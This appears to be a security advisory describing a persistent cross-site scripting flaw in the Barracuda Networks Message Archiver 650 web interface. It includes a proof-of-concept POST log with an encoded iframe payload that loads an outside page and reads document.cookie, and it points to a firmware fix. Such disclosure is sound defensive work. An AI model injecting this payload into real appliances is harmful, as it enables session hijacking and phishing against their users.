Barracuda Networks Message Archiver 650 - Persistent XSS Vulnerability

Technical Details & Description:
================================
A persistent input validation web vulnerability has been discovered in the official Barracuda Networks Message Archiver 650 v3.2 appliance web-application.
The remote vulnerability allows remote attackers to inject own malicious script codes on the application-side of the vulnerable application module.
 
The vulnerability is located in the `Benutzer > Neu Anlegen > Rolle: Auditor > Domänen` module. Remote attackers are able to inject own malicious script
codes in the vulnerable domain_list_table-r0 values. The execution of the script code occurs in the domain_list_table-r0 and user_domain_admin:1 appliance
application response context. The request method is POST and the attack vector is persistent on the application-side of the barracuda networks message
archiver web appliance.
 
The security risk of the persistent input validation web vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 3.6.
Exploitation of the vulnerability requires a low privileged or restricted application user account with low or medium user interaction. Successful exploitation
of the vulnerability results in session hijacking, persistent phishing, persistent external redirects and persistent manipulation of module context.
 
Request Method(s):
                [+] POST
 
Vulnerable Module(s):
                [+] Benutzer > Neu Anlegen > Rolle: Auditor
 
Vulnerable Input(s):
                [+] Domänen
 
Vulnerable Parameter(s):
                [+] domain_list_table-r0
 
Affected Module(s):
                [+] Rolle: Auditor Listing
 
 
Proof of Concept (PoC):
=======================
The persistent web vulnerability can be exploited by remote attackers with low privileged or restricted application user account and low required user inter action.
For security demonstration or to reproduce the remote web vulnerability follow the provided information and steps below to continue.
 
--- PoC Session Logs [POST] ---
ajax_bc_sub=addDomain
domain=%22%3E%3Ciframe%20src%3Dhttp%3A%2F%2Fvuln-lab.com%20onload%3Dalert(document.cookie)%20%3C%20%20%22%3E%3Ciframe%20src
%3Dhttp%3A%2F%2Fsite.com%20onload%3Dalert(document.cookie)%20%3C
user=guest
password=75361da9533223d9685576d10bd6aa02
et=
1352520628
locale=de_DE
realm=
auth_type=Local
primary_tab=USERS
secondary_tab=per_user_add_update
 
 
PoC (URL):
http://archiver.ptest.localhost:3378/cgi-mod/index.cgi?auth_type=Local&et=1352520461&locale=de_DE&password=4b0a7f3a136e60c7cf73ec1b30ec6a23&
primary_tab=USERS&realm=&secondary_tab=per_user_add_update&user=benjaminKM
 
 
PoC: Benutzer > Neu Anlegen > Rolle: Auditor > Domänen > (domain_list_table-r0)
<td style="vertical-align:middle;text-align:left;white-space:nowrap">
 %20​​​​​">​​​​​<iframe src="http://site.com" onload="alert(document.cookie)" <=""
"="[PERSISTENT INJECTED SCRIPT CODE!]< </iframe><input name="user_domain_admin:1"
id="user_domain_admin:1" value=""[PERSISTENT INJECTED SCRIPT CODE!]" type="hidden"></td>
 
 
Reference(s):
http://archiver.ptest.localhost:3378/cgi-mod/index.cgi
 
http://archiver.ptest.localhost:3378/cgi-mod/index.cgi?auth_type=Local&et=1352520461&locale=de_DE&password=4b0a7f3a136e60c7cf73ec1b30ec6a23&
primary_tab=USERS&realm=&secondary_tab=per_user_add_update&user=benjaminKM_0ne
 
 
 
Solution - Fix & Patch:
=======================
vulnerable affected listing in the domain_list_table-r0 parameter(s).
 
Barracuda Networks Appliance: Advanced >Firmware Updates Page
https://www.barracuda.com/support/knowledgebase/501600000013lXe

#  0day.today [2018-04-10]  #